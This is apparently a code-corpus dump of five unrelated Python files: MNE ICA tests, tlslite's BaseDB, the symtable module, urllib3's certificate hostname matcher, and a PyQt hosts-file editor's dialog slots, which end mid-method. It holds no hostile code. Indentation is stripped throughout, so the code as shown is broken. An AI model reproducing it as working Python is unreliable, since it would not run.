assert_equal(ica_sorted.labels_, dict(blink=[3], think=[2]))
# epochs extraction from raw fit
assert_raises(RuntimeError, ica.get_sources, epochs)
# test reading and writing
test_ica_fname = op.join(op.dirname(tempdir), 'test-ica.fif')
for cov in (None, test_cov):
ica = ICA(noise_cov=cov, n_components=2, max_pca_components=4,
n_pca_components=4)
with warnings.catch_warnings(record=True): # ICA does not converge
ica.fit(raw, picks=picks, start=start, stop=stop2)
sources = ica.get_sources(epochs).get_data()
assert_true(ica.mixing_matrix_.shape == (2, 2))
assert_true(ica.unmixing_matrix_.shape == (2, 2))
assert_true(ica.pca_components_.shape == (4, len(picks)))
assert_true(sources.shape[1] == ica.n_components_)
for exclude in [[], [0]]:
ica.exclude = exclude
ica.labels_ = {'foo': [0]}
ica.save(test_ica_fname)
ica_read = read_ica(test_ica_fname)
assert_true(ica.exclude == ica_read.exclude)
assert_equal(ica.labels_, ica_read.labels_)
ica.exclude = []
ica.apply(raw, exclude=[1])
assert_true(ica.exclude == [])
ica.exclude = [0, 1]
ica.apply(raw, exclude=[1])
assert_true(ica.exclude == [0, 1])
ica_raw = ica.get_sources(raw)
assert_true(ica.exclude == [ica_raw.ch_names.index(e) for e in
ica_raw.info['bads']])
# test filtering
d1 = ica_raw._data[0].copy()
ica_raw.filter(4, 20, l_trans_bandwidth='auto',
h_trans_bandwidth='auto', filter_length='auto',
phase='zero', fir_window='hamming')
assert_equal(ica_raw.info['lowpass'], 20.)
assert_equal(ica_raw.info['highpass'], 4.)
assert_true((d1 != ica_raw._data[0]).any())
d1 = ica_raw._data[0].copy()
ica_raw.notch_filter([10], filter_length='auto', trans_bandwidth=10,
phase='zero', fir_window='hamming')
assert_true((d1 != ica_raw._data[0]).any())
ica.n_pca_components = 2
ica.method = 'fake'
ica.save(test_ica_fname)
ica_read = read_ica(test_ica_fname)
assert_true(ica.n_pca_components == ica_read.n_pca_components)
assert_equal(ica.method, ica_read.method)
assert_equal(ica.labels_, ica_read.labels_)
# check type consistency
attrs = ('mixing_matrix_ unmixing_matrix_ pca_components_ '
'pca_explained_variance_ _pre_whitener')
def f(x, y):
return getattr(x, y).dtype
for attr in attrs.split():
assert_equal(f(ica_read, attr), f(ica, attr))
ica.n_pca_components = 4
ica_read.n_pca_components = 4
ica.exclude = []
ica.save(test_ica_fname)
ica_read = read_ica(test_ica_fname)
for attr in ['mixing_matrix_', 'unmixing_matrix_', 'pca_components_',
'pca_mean_', 'pca_explained_variance_',
'_pre_whitener']:
assert_array_almost_equal(getattr(ica, attr),
getattr(ica_read, attr))
assert_true(ica.ch_names == ica_read.ch_names)
assert_true(isinstance(ica_read.info, Info))
sources = ica.get_sources(raw)[:, :][0]
sources2 = ica_read.get_sources(raw)[:, :][0]
assert_array_almost_equal(sources, sources2)
_raw1 = ica.apply(raw, exclude=[1])
_raw2 = ica_read.apply(raw, exclude=[1])
assert_array_almost_equal(_raw1[:, :][0], _raw2[:, :][0])
os.remove(test_ica_fname)
    # check score funcs
for name, func in get_score_funcs().items():
if name in score_funcs_unsuited:
continue
scores = ica.score_sources(raw, target='EOG 061', score_func=func,
start=0, stop=10)
assert_true(ica.n_components_ == len(scores))
# check univariate stats
scores = ica.score_sources(raw, score_func=stats.skew)
# check exception handling
assert_raises(ValueError, ica.score_sources, raw,
target=np.arange(1))
params = []
    params += [(None, -1, slice(2), [0, 1])]  # variance, kurtosis idx params
params += [(None, 'MEG 1531')] # ECG / EOG channel params
for idx, ch_name in product(*params):
ica.detect_artifacts(raw, start_find=0, stop_find=50, ecg_ch=ch_name,
eog_ch=ch_name, skew_criterion=idx,
var_criterion=idx, kurt_criterion=idx)
with warnings.catch_warnings(record=True):
idx, scores = ica.find_bads_ecg(raw, method='ctps')
assert_equal(len(scores), ica.n_components_)
idx, scores = ica.find_bads_ecg(raw, method='correlation')
assert_equal(len(scores), ica.n_components_)
idx, scores = ica.find_bads_eog(raw)
assert_equal(len(scores), ica.n_components_)
ica.labels_ = None
idx, scores = ica.find_bads_ecg(epochs, method='ctps')
assert_equal(len(scores), ica.n_components_)
assert_raises(ValueError, ica.find_bads_ecg, epochs.average(),
method='ctps')
assert_raises(ValueError, ica.find_bads_ecg, raw,
method='crazy-coupling')
raw.info['chs'][raw.ch_names.index('EOG 061') - 1]['kind'] = 202
idx, scores = ica.find_bads_eog(raw)
assert_true(isinstance(scores, list))
assert_equal(len(scores[0]), ica.n_components_)
# check score funcs
for name, func in get_score_funcs().items():
if name in score_funcs_unsuited:
continue
scores = ica.score_sources(epochs_eog, target='EOG 061',
score_func=func)
assert_true(ica.n_components_ == len(scores))
# check univariate stats
scores = ica.score_sources(epochs, score_func=stats.skew)
# check exception handling
assert_raises(ValueError, ica.score_sources, epochs,
target=np.arange(1))
# ecg functionality
ecg_scores = ica.score_sources(raw, target='MEG 1531',
score_func='pearsonr')
with warnings.catch_warnings(record=True): # filter attenuation warning
ecg_events = ica_find_ecg_events(raw,
sources[np.abs(ecg_scores).argmax()])
assert_true(ecg_events.ndim == 2)
# eog functionality
eog_scores = ica.score_sources(raw, target='EOG 061',
score_func='pearsonr')
with warnings.catch_warnings(record=True): # filter attenuation warning
eog_events = ica_find_eog_events(raw,
sources[np.abs(eog_scores).argmax()])
assert_true(eog_events.ndim == 2)
# Test ica fiff export
ica_raw = ica.get_sources(raw, start=0, stop=100)
assert_true(ica_raw.last_samp - ica_raw.first_samp == 100)
assert_true(len(ica_raw._filenames) == 0) # API consistency
ica_chans = [ch for ch in ica_raw.ch_names if 'ICA' in ch]
assert_true(ica.n_components_ == len(ica_chans))
test_ica_fname = op.join(op.abspath(op.curdir), 'test-ica_raw.fif')
ica.n_components = np.int32(ica.n_components)
ica_raw.save(test_ica_fname, overwrite=True)
ica_raw2 = read_raw_fif(test_ica_fname, preload=True, add_eeg_ref=False)
assert_allclose(ica_raw._data, ica_raw2._data, rtol=1e-5, atol=1e-4)
ica_raw2.close()
os.remove(test_ica_fname)
# Test ica epochs export
ica_epochs = ica.get_sources(epochs)
assert_true(ica_epochs.events.shape == epochs.events.shape)
ica_chans = [ch for ch in ica_epochs.ch_names if 'ICA' in ch]
assert_true(ica.n_components_ == len(ica_chans))
assert_true(ica.n_components_ == ica_epochs.get_data().shape[1])
assert_true(ica_epochs._raw is None)
assert_true(ica_epochs.preload is True)
# test float n pca components
ica.pca_explained_variance_ = np.array([0.2] * 5)
ica.n_components_ = 0
for ncomps, expected in [[0.3, 1], [0.9, 4], [1, 1]]:
ncomps_ = ica._check_n_pca_components(ncomps)
assert_true(ncomps_ == expected)
@requires_sklearn
def test_run_ica():
"""Test run_ica function."""
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(1.5, stop, copy=False).load_data()
params = []
    params += [(None, -1, slice(2), [0, 1])]  # variance, kurtosis idx
params += [(None, 'MEG 1531')] # ECG / EOG channel params
for idx, ch_name in product(*params):
warnings.simplefilter('always')
with warnings.catch_warnings(record=True):
run_ica(raw, n_components=2, start=0, stop=6, start_find=0,
stop_find=5, ecg_ch=ch_name, eog_ch=ch_name,
skew_criterion=idx, var_criterion=idx, kurt_criterion=idx)
@requires_sklearn
def test_ica_reject_buffer():
"""Test ICA data raw buffer rejection."""
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(1.5, stop, copy=False).load_data()
picks = pick_types(raw.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')
ica = ICA(n_components=3, max_pca_components=4, n_pca_components=4)
raw._data[2, 1000:1005] = 5e-12
with catch_logging() as drop_log:
with warnings.catch_warnings(record=True):
ica.fit(raw, picks[:5], reject=dict(mag=2.5e-12), decim=2,
tstep=0.01, verbose=True)
assert_true(raw._data[:5, ::2].shape[1] - 4 == ica.n_samples_)
log = [l for l in drop_log.getvalue().split('\n') if 'detected' in l]
assert_equal(len(log), 1)
@requires_sklearn
def test_ica_twice():
"""Test running ICA twice."""
raw = read_raw_fif(raw_fname, add_eeg_ref=False)
raw.crop(1.5, stop, copy=False).load_data()
picks = pick_types(raw.info, meg='grad', exclude='bads')
n_components = 0.9
max_pca_components = None
n_pca_components = 1.1
with warnings.catch_warnings(record=True):
ica1 = ICA(n_components=n_components,
max_pca_components=max_pca_components,
n_pca_components=n_pca_components, random_state=0)
ica1.fit(raw, picks=picks, decim=3)
raw_new = ica1.apply(raw, n_pca_components=n_pca_components)
ica2 = ICA(n_components=n_components,
max_pca_components=max_pca_components,
n_pca_components=1.0, random_state=0)
ica2.fit(raw_new, picks=picks, decim=3)
assert_equal(ica1.n_components_, ica2.n_components_)
@requires_sklearn
def test_fit_params():
"""Test fit_params for ICA."""
assert_raises(ValueError, ICA, fit_params=dict(extended=True))
fit_params = {}
ICA(fit_params=fit_params) # test no side effects
assert_equal(fit_params, {})
@requires_sklearn
def test_bad_channels():
"""Test exception when unsupported channels are used."""
chs = [i for i in _kind_dict]
data_chs = _DATA_CH_TYPES_SPLIT + ['eog']
chs_bad = list(set(chs) - set(data_chs))
info = create_info(len(chs), 500, chs)
data = np.random.rand(len(chs), 50)
raw = RawArray(data, info)
data = np.random.rand(100, len(chs), 50)
epochs = EpochsArray(data, info)
n_components = 0.9
ica = ICA(n_components=n_components, method='fastica')
for inst in [raw, epochs]:
for ch in chs_bad:
# Test case for only bad channels
picks_bad1 = pick_types(inst.info, meg=False,
**{str(ch): True})
# Test case for good and bad channels
picks_bad2 = pick_types(inst.info, meg=True,
**{str(ch): True})
assert_raises(ValueError, ica.fit, inst, picks=picks_bad1)
assert_raises(ValueError, ica.fit, inst, picks=picks_bad2)
assert_raises(ValueError, ica.fit, inst, picks=[])
@requires_sklearn
def test_eog_channel():
"""Test that EOG channel is included when performing ICA."""
raw = read_raw_fif(raw_fname, preload=True, add_eeg_ref=False)
events = read_events(event_name)
picks = pick_types(raw.info, meg=True, stim=True, ecg=False,
eog=True, exclude='bads')
epochs = Epochs(raw, events, event_id, tmin, tmax, picks=picks,
baseline=(None, 0), preload=True,
add_eeg_ref=False)
n_components = 0.9
ica = ICA(n_components=n_components, method='fastica')
# Test case for MEG and EOG data. Should have EOG channel
for inst in [raw, epochs]:
picks1a = pick_types(inst.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')[:4]
picks1b = pick_types(inst.info, meg=False, stim=False, ecg=False,
eog=True, exclude='bads')
picks1 = np.append(picks1a, picks1b)
ica.fit(inst, picks=picks1)
assert_true(any('EOG' in ch for ch in ica.ch_names))
# Test case for MEG data. Should have no EOG channel
for inst in [raw, epochs]:
picks1 = pick_types(inst.info, meg=True, stim=False, ecg=False,
eog=False, exclude='bads')[:5]
ica.fit(inst, picks=picks1)
assert_false(any('EOG' in ch for ch in ica.ch_names))
run_tests_if_main()
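# Illustrative sketch (comments only, not part of the test suite): the core
# ICA workflow exercised by the tests above. `raw` is assumed to be a
# preloaded Raw instance and the file name is hypothetical.
#
#     ica = ICA(n_components=0.95, method='fastica', random_state=0)
#     ica.fit(raw, picks=pick_types(raw.info, meg=True, exclude='bads'))
#     eog_inds, eog_scores = ica.find_bads_eog(raw)
#     ica.exclude = eog_inds
#     raw_clean = ica.apply(raw.copy())
#     ica.save('example-ica.fif')              # hypothetical path
#     ica_restored = read_ica('example-ica.fif')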
| bsd-3-clause |
klusark/android_external_chromium_org | third_party/tlslite/tlslite/BaseDB.py | 121 | 3389 | """Base class for SharedKeyDB and VerifierDB."""
import anydbm
import thread
class BaseDB:
def __init__(self, filename, type):
self.type = type
self.filename = filename
if self.filename:
self.db = None
else:
self.db = {}
self.lock = thread.allocate_lock()
def create(self):
"""Create a new on-disk database.
@raise anydbm.error: If there's a problem creating the database.
"""
if self.filename:
self.db = anydbm.open(self.filename, "n") #raises anydbm.error
self.db["--Reserved--type"] = self.type
self.db.sync()
else:
self.db = {}
def open(self):
"""Open a pre-existing on-disk database.
@raise anydbm.error: If there's a problem opening the database.
@raise ValueError: If the database is not of the right type.
"""
if not self.filename:
raise ValueError("Can only open on-disk databases")
self.db = anydbm.open(self.filename, "w") #raises anydbm.error
try:
if self.db["--Reserved--type"] != self.type:
raise ValueError("Not a %s database" % self.type)
except KeyError:
raise ValueError("Not a recognized database")
def __getitem__(self, username):
if self.db == None:
raise AssertionError("DB not open")
self.lock.acquire()
try:
valueStr = self.db[username]
finally:
self.lock.release()
return self._getItem(username, valueStr)
def __setitem__(self, username, value):
if self.db == None:
raise AssertionError("DB not open")
valueStr = self._setItem(username, value)
self.lock.acquire()
try:
self.db[username] = valueStr
if self.filename:
self.db.sync()
finally:
self.lock.release()
def __delitem__(self, username):
if self.db == None:
raise AssertionError("DB not open")
self.lock.acquire()
try:
del(self.db[username])
if self.filename:
self.db.sync()
finally:
self.lock.release()
def __contains__(self, username):
"""Check if the database contains the specified username.
@type username: str
@param username: The username to check for.
@rtype: bool
@return: True if the database contains the username, False
otherwise.
"""
if self.db == None:
raise AssertionError("DB not open")
self.lock.acquire()
try:
return self.db.has_key(username)
finally:
self.lock.release()
def check(self, username, param):
value = self.__getitem__(username)
return self._checkItem(value, username, param)
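    # Illustrative sketch (comments only): typical use through a concrete
    # subclass such as tlslite's VerifierDB, which supplies the _getItem /
    # _setItem / _checkItem hooks. The path and entry value are hypothetical.
    #
    #     db = VerifierDB("/tmp/verifiers.db")
    #     db.create()                # or db.open() for an existing file
    #     db["alice"] = entry        # stored via _setItem, synced to disk
    #     if "alice" in db:
    #         entry = db["alice"]    # loaded via _getItem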
def keys(self):
"""Return a list of usernames in the database.
@rtype: list
@return: The usernames in the database.
"""
if self.db == None:
raise AssertionError("DB not open")
self.lock.acquire()
try:
usernames = self.db.keys()
finally:
self.lock.release()
usernames = [u for u in usernames if not u.startswith("--Reserved--")]
return usernames | bsd-3-clause |
gautamMalu/rootfs_xen_arndale | usr/lib/python2.7/symtable.py | 68 | 7437 | """Interface to the compiler's internal symbol tables"""
import _symtable
from _symtable import (USE, DEF_GLOBAL, DEF_LOCAL, DEF_PARAM,
DEF_IMPORT, DEF_BOUND, OPT_IMPORT_STAR, OPT_EXEC, OPT_BARE_EXEC,
SCOPE_OFF, SCOPE_MASK, FREE, GLOBAL_IMPLICIT, GLOBAL_EXPLICIT, CELL, LOCAL)
import weakref
__all__ = ["symtable", "SymbolTable", "Class", "Function", "Symbol"]
def symtable(code, filename, compile_type):
top = _symtable.symtable(code, filename, compile_type)
return _newSymbolTable(top, filename)
class SymbolTableFactory:
def __init__(self):
self.__memo = weakref.WeakValueDictionary()
def new(self, table, filename):
if table.type == _symtable.TYPE_FUNCTION:
return Function(table, filename)
if table.type == _symtable.TYPE_CLASS:
return Class(table, filename)
return SymbolTable(table, filename)
def __call__(self, table, filename):
key = table, filename
obj = self.__memo.get(key, None)
if obj is None:
obj = self.__memo[key] = self.new(table, filename)
return obj
_newSymbolTable = SymbolTableFactory()
class SymbolTable(object):
def __init__(self, raw_table, filename):
self._table = raw_table
self._filename = filename
self._symbols = {}
def __repr__(self):
if self.__class__ == SymbolTable:
kind = ""
else:
kind = "%s " % self.__class__.__name__
if self._table.name == "global":
return "<{0}SymbolTable for module {1}>".format(kind, self._filename)
else:
return "<{0}SymbolTable for {1} in {2}>".format(kind,
self._table.name,
self._filename)
def get_type(self):
if self._table.type == _symtable.TYPE_MODULE:
return "module"
if self._table.type == _symtable.TYPE_FUNCTION:
return "function"
if self._table.type == _symtable.TYPE_CLASS:
return "class"
assert self._table.type in (1, 2, 3), \
"unexpected type: {0}".format(self._table.type)
def get_id(self):
return self._table.id
def get_name(self):
return self._table.name
def get_lineno(self):
return self._table.lineno
def is_optimized(self):
return bool(self._table.type == _symtable.TYPE_FUNCTION
and not self._table.optimized)
def is_nested(self):
return bool(self._table.nested)
def has_children(self):
return bool(self._table.children)
def has_exec(self):
"""Return true if the scope uses exec"""
return bool(self._table.optimized & (OPT_EXEC | OPT_BARE_EXEC))
def has_import_star(self):
"""Return true if the scope uses import *"""
return bool(self._table.optimized & OPT_IMPORT_STAR)
def get_identifiers(self):
return self._table.symbols.keys()
def lookup(self, name):
sym = self._symbols.get(name)
if sym is None:
flags = self._table.symbols[name]
namespaces = self.__check_children(name)
sym = self._symbols[name] = Symbol(name, flags, namespaces)
return sym
def get_symbols(self):
return [self.lookup(ident) for ident in self.get_identifiers()]
def __check_children(self, name):
return [_newSymbolTable(st, self._filename)
for st in self._table.children
if st.name == name]
def get_children(self):
return [_newSymbolTable(st, self._filename)
for st in self._table.children]
class Function(SymbolTable):
# Default values for instance variables
__params = None
__locals = None
__frees = None
__globals = None
def __idents_matching(self, test_func):
return tuple([ident for ident in self.get_identifiers()
if test_func(self._table.symbols[ident])])
def get_parameters(self):
if self.__params is None:
self.__params = self.__idents_matching(lambda x:x & DEF_PARAM)
return self.__params
def get_locals(self):
if self.__locals is None:
locs = (LOCAL, CELL)
test = lambda x: ((x >> SCOPE_OFF) & SCOPE_MASK) in locs
self.__locals = self.__idents_matching(test)
return self.__locals
def get_globals(self):
if self.__globals is None:
glob = (GLOBAL_IMPLICIT, GLOBAL_EXPLICIT)
test = lambda x:((x >> SCOPE_OFF) & SCOPE_MASK) in glob
self.__globals = self.__idents_matching(test)
return self.__globals
def get_frees(self):
if self.__frees is None:
is_free = lambda x:((x >> SCOPE_OFF) & SCOPE_MASK) == FREE
self.__frees = self.__idents_matching(is_free)
return self.__frees
class Class(SymbolTable):
__methods = None
def get_methods(self):
if self.__methods is None:
d = {}
for st in self._table.children:
d[st.name] = 1
self.__methods = tuple(d)
return self.__methods
class Symbol(object):
def __init__(self, name, flags, namespaces=None):
self.__name = name
self.__flags = flags
self.__scope = (flags >> SCOPE_OFF) & SCOPE_MASK # like PyST_GetScope()
self.__namespaces = namespaces or ()
def __repr__(self):
return "<symbol {0!r}>".format(self.__name)
def get_name(self):
return self.__name
def is_referenced(self):
return bool(self.__flags & _symtable.USE)
def is_parameter(self):
return bool(self.__flags & DEF_PARAM)
def is_global(self):
return bool(self.__scope in (GLOBAL_IMPLICIT, GLOBAL_EXPLICIT))
def is_declared_global(self):
return bool(self.__scope == GLOBAL_EXPLICIT)
def is_local(self):
return bool(self.__flags & DEF_BOUND)
def is_free(self):
return bool(self.__scope == FREE)
def is_imported(self):
return bool(self.__flags & DEF_IMPORT)
def is_assigned(self):
return bool(self.__flags & DEF_LOCAL)
def is_namespace(self):
"""Returns true if name binding introduces new namespace.
If the name is used as the target of a function or class
statement, this will be true.
Note that a single name can be bound to multiple objects. If
is_namespace() is true, the name may also be bound to other
objects, like an int or list, that does not introduce a new
namespace.
"""
return bool(self.__namespaces)
def get_namespaces(self):
"""Return a list of namespaces bound to this name"""
return self.__namespaces
def get_namespace(self):
"""Returns the single namespace bound to this name.
Raises ValueError if the name is bound to multiple namespaces.
"""
if len(self.__namespaces) != 1:
raise ValueError, "name is bound to multiple namespaces"
return self.__namespaces[0]
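# Illustrative sketch (comments only): inspecting the scopes of a function
# with this API. The source string below is made up for the example.
#
#     src = "def f(x):\n    y = x + g\n    return y\n"
#     mod = symtable(src, "<example>", "exec")
#     func = mod.get_children()[0]     # Function table for f
#     print func.get_parameters()      # ('x',)
#     print func.get_locals()          # ('x', 'y'), order may vary
#     print func.get_globals()         # ('g',)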
if __name__ == "__main__":
import os, sys
src = open(sys.argv[0]).read()
mod = symtable(src, os.path.split(sys.argv[0])[1], "exec")
for ident in mod.get_identifiers():
info = mod.lookup(ident)
print info, info.is_local(), info.is_namespace()
| gpl-2.0 |
thomas-young-2013/wherehowsX | metadata-etl/src/main/resources/jython/requests/packages/urllib3/packages/ssl_match_hostname/_implementation.py | 2360 | 3778 | """The match_hostname() function from Python 3.3.3, essential when using SSL."""
# Note: This file is under the PSF license as the code comes from the python
# stdlib. http://docs.python.org/3/license.html
import re
__version__ = '3.4.0.2'
class CertificateError(ValueError):
pass
def _dnsname_match(dn, hostname, max_wildcards=1):
"""Matching according to RFC 6125, section 6.4.3
http://tools.ietf.org/html/rfc6125#section-6.4.3
"""
pats = []
if not dn:
return False
# Ported from python3-syntax:
# leftmost, *remainder = dn.split(r'.')
parts = dn.split(r'.')
leftmost = parts[0]
remainder = parts[1:]
wildcards = leftmost.count('*')
if wildcards > max_wildcards:
# Issue #17980: avoid denials of service by refusing more
# than one wildcard per fragment. A survey of established
# policy among SSL implementations showed it to be a
# reasonable choice.
raise CertificateError(
"too many wildcards in certificate DNS name: " + repr(dn))
# speed up common case w/o wildcards
if not wildcards:
return dn.lower() == hostname.lower()
# RFC 6125, section 6.4.3, subitem 1.
# The client SHOULD NOT attempt to match a presented identifier in which
# the wildcard character comprises a label other than the left-most label.
if leftmost == '*':
# When '*' is a fragment by itself, it matches a non-empty dotless
# fragment.
pats.append('[^.]+')
elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
# RFC 6125, section 6.4.3, subitem 3.
# The client SHOULD NOT attempt to match a presented identifier
# where the wildcard character is embedded within an A-label or
# U-label of an internationalized domain name.
pats.append(re.escape(leftmost))
else:
# Otherwise, '*' matches any dotless string, e.g. www*
pats.append(re.escape(leftmost).replace(r'\*', '[^.]*'))
# add the remaining fragments, ignore any wildcards
for frag in remainder:
pats.append(re.escape(frag))
pat = re.compile(r'\A' + r'\.'.join(pats) + r'\Z', re.IGNORECASE)
return pat.match(hostname)
def match_hostname(cert, hostname):
"""Verify that *cert* (in decoded format as returned by
SSLSocket.getpeercert()) matches the *hostname*. RFC 2818 and RFC 6125
rules are followed, but IP addresses are not accepted for *hostname*.
CertificateError is raised on failure. On success, the function
returns nothing.
"""
if not cert:
raise ValueError("empty or no certificate")
dnsnames = []
san = cert.get('subjectAltName', ())
for key, value in san:
if key == 'DNS':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if not dnsnames:
# The subject is only checked when there is no dNSName entry
# in subjectAltName
for sub in cert.get('subject', ()):
for key, value in sub:
# XXX according to RFC 2818, the most specific Common Name
# must be used.
if key == 'commonName':
if _dnsname_match(value, hostname):
return
dnsnames.append(value)
if len(dnsnames) > 1:
raise CertificateError("hostname %r "
"doesn't match either of %s"
% (hostname, ', '.join(map(repr, dnsnames))))
elif len(dnsnames) == 1:
raise CertificateError("hostname %r "
"doesn't match %r"
% (hostname, dnsnames[0]))
else:
raise CertificateError("no appropriate commonName or "
"subjectAltName fields were found")
| apache-2.0 |
Lyon1994/huhamhire-hosts | gui/qdialog_slots.py | 24 | 11695 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# qdialog_slots.py : Qt slots responding to signals on the main dialog.
#
# Copyleft (C) 2014 - huhamhire hosts team <hosts@huhamhire.com>
# =====================================================================
# Licensed under the GNU General Public License, version 3. You should
# have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
#
# This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING
# THE WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE.
# =====================================================================
__author__ = "huhamhire <me@huhamhire.com>"
import shutil
import time
from PyQt4 import QtCore, QtGui
from language import LangUtil
from qdialog_d import QDialogDaemon
from util_ui import _translate
import sys
sys.path.append("..")
from util import RetrieveData
class QDialogSlots(QDialogDaemon):
"""
QDialogSlots class provides `Qt slots` to deal with the `Qt signals`
emitted by the widgets on the main dialog operated by users.
.. note:: This class is subclass of :class:`~gui.qdialog_d.QDialogDaemon`
class and parent class of :class:`~gui.hostsutil.HostsUtil`.
:ivar int ipv_id: An flag indicating current IP version setting. The
value could be 1 or 0:
====== ==========
ipv_id IP Version
====== ==========
1 IPv6
0 IPv4
====== ==========
.. seealso::
:meth:`~gui.qdialog_slots.QDialogSlots.on_IPVersion_changed`. in
this class.
:ivar str make_path: Temporary path to store generated hosts file. The
default value of :attr:`make_path` is "`./hosts`".
:ivar int mirror_id: Index number of current selected server from the
mirror list.
"""
_ipv_id = 0
make_path = "./hosts"
mirror_id = 0
def __init__(self):
"""
Initialize a new instance of this class.
"""
super(QDialogSlots, self).__init__()
def reject(self):
"""
Close this program while the reject signal is emitted.
.. note:: This method is the slot responses to the reject signal from
an instance of the main dialog.
"""
self.close()
return QtGui.QDialog.reject(self)
def close(self):
"""
Close this program while the close signal is emitted.
.. note:: This method is the slot responses to the close signal from
an instance of the main dialog.
"""
try:
RetrieveData.clear()
except:
pass
super(QDialogDaemon, self).close()
def mouseMoveEvent(self, e):
"""
Allow drag operations to set the new position for current cursor.
:param e: Current mouse event.
:type e: :class:`PyQt4.QtGui.QMouseEvent`
"""
if e.buttons() & QtCore.Qt.LeftButton:
try:
self.move(e.globalPos() - self.dragPos)
except AttributeError:
pass
e.accept()
def mousePressEvent(self, e):
"""
Allow press operation to set the new position for current dialog.
:param e: Current mouse event.
:type e: :class:`PyQt4.QtGui.QMouseEvent`
"""
if e.button() == QtCore.Qt.LeftButton:
self.dragPos = e.globalPos() - self.frameGeometry().topLeft()
e.accept()
def on_Mirror_changed(self, mirr_id):
"""
Change the current server selection.
.. note:: This method is the slot responses to the signal argument
:attr:`mirr_id` from SelectMirror widget while the value is
changed.
:param mirr_id: Index number of current mirror server.
"""
self.mirror_id = mirr_id
self.check_connection()
def on_IPVersion_changed(self, ipv_id):
"""
Change the current IP version setting.
.. note:: This method is the slot responses to the signal argument
:attr:`ipv_id` from SelectIP widget while the value is changed.
:param ipv_id: An flag indicating current IP version setting. The
value could be 1 or 0:
====== ==========
ipv_id IP Version
====== ==========
1 IPv6
0 IPv4
====== ==========
:type ipv_id: int
"""
if self._ipv_id != ipv_id:
self._ipv_id = ipv_id
if not RetrieveData.db_exists():
self.warning_no_datafile()
else:
self.set_func_list(0)
self.refresh_func_list()
def on_Selection_changed(self, item):
"""
Change the current selection of modules to be applied to hosts file.
.. note:: This method is the slot responses to the signal argument
:attr:`item` from Functionlist widget while the item selection is
changed.
:param item: Row number of the item listed in Functionlist which is
changed by user.
:type item: int
"""
ip_flag = self._ipv_id
func_id = self.ui.Functionlist.row(item)
if self._funcs[ip_flag][func_id] == 0:
self._funcs[ip_flag][func_id] = 1
else:
self._funcs[ip_flag][func_id] = 0
mutex = RetrieveData.get_ids(self.choice[ip_flag][func_id][2])
for c_id, c in enumerate(self.choice[ip_flag]):
if c[0] == self.choice[ip_flag][func_id][0]:
if c[1] in mutex and self._funcs[ip_flag][c_id] == 1:
self._funcs[ip_flag][c_id] = 0
self.refresh_func_list()
def on_Lang_changed(self, lang):
"""
Change the UI language setting.
.. note:: This method is the slot responses to the signal argument
:attr:`lang` from SelectLang widget while the value is changed.
:param lang: The language name which is selected by user.
.. note:: This string is typically in the format of IETF language
tag. For example: en_US, en_GB, etc.
.. seealso:: :attr:`language` in :class:`~gui.language.LangUtil`
class.
:type lang: str
"""
new_lang = LangUtil.get_locale_by_language(unicode(lang))
trans = QtCore.QTranslator()
from hostsutil import LANG_DIR
trans.load(LANG_DIR + new_lang)
self.app.removeTranslator(self._trans)
self.app.installTranslator(trans)
self._trans = trans
self.ui.retranslateUi(self)
self.init_main()
self.check_connection()
def on_MakeHosts_clicked(self):
"""
Start operations to make a hosts file.
.. note:: This method is the slot responses to the signal from
ButtonApply widget while the button is clicked.
.. note:: No operations would be called if current session does not
have the privileges to change the hosts file.
"""
if not self._writable:
self.warning_permission()
return
if self.question_apply():
self.make_path = "./hosts"
self.make_hosts("system")
else:
return
def on_MakeANSI_clicked(self):
"""
Export a hosts file encoded in ANSI.
.. note:: This method is the slot responses to the signal from
ButtonANSI widget while the button is clicked.
"""
self.make_path = self.export_hosts()
if unicode(self.make_path) != u'':
self.make_hosts("ansi")
def on_MakeUTF8_clicked(self):
"""
Export a hosts file encoded in UTF-8.
.. note:: This method is the slot responses to the signal from
ButtonUTF widget while the button is clicked.
"""
self.make_path = self.export_hosts()
if unicode(self.make_path) != u'':
self.make_hosts("utf-8")
def on_Backup_clicked(self):
"""
Backup the hosts file of current operating system.
.. note:: This method is the slot responses to the signal from
ButtonBackup widget while the button is clicked.
"""
l_time = time.localtime(time.time())
backtime = time.strftime("%Y-%m-%d-%H%M%S", l_time)
filename = "hosts_" + backtime + ".bak"
if self.platform == "OS X":
filename = "/Users/" + filename
filepath = QtGui.QFileDialog.getSaveFileName(
self, _translate("Util", "Backup hosts", None),
QtCore.QString(filename),
_translate("Util", "Backup File(*.bak)", None))
if unicode(filepath) != u'':
shutil.copy2(self.hosts_path, unicode(filepath))
self.info_complete()
def on_Restore_clicked(self):
"""
Restore a previously backed up hosts file.
        .. note:: This method is the slot that responds to the signal from
            the ButtonRestore widget while the button is clicked. It opens a
            file dialog to locate a backup file and restores it to the
            system hosts path.
.. note:: No operations would be called if current session does not
have the privileges to change the hosts file.
"""
if not self._writable:
self.warning_permission()
return
filename = ''
if self.platform == "OS X":
filename = "/Users/" + filename
filepath = QtGui.QFileDialog.getOpenFileName(
self, _translate("Util", "Restore hosts", None),
QtCore.QString(filename),
_translate("Util", "Backup File(*.bak)", None))
if unicode(filepath) != u'':
shutil.copy2(unicode(filepath), self.hosts_path)
self.info_complete()
def on_CheckUpdate_clicked(self):
"""
Retrieve update information (metadata) of the latest data file from a
specified server.
.. note:: This method is the slot responses to the signal from
ButtonCheck widget while the button is clicked.
"""
if self.choice != [[], []]:
self.refresh_func_list()
self.set_update_click_btns()
if self._update == {} or self._update["version"] == \
unicode(_translate("Util", "[Error]", None)):
self.check_update()
def on_FetchUpdate_clicked(self):
"""
Retrieve the latest hosts data file.
        .. note:: This method is the slot that responds to the signal from
            the ButtonUpdate widget while the button is clicked. It starts
            the operations to fetch the latest hosts data file.
.. note:: Method :meth:`~gui.qdialog_slots.on_CheckUpdate_clicked`
would be called if no update information has been set,
.. note:: If the current data is up-to-date, no data file would be
retrieved.
"""
self.set_fetch_click_btns()
self._down_flag = 1
if self._update == {} or self._update["version"] == \
unicode(_translate("Util", "[Error]", None)):
self.check_update()
elif self.new_version():
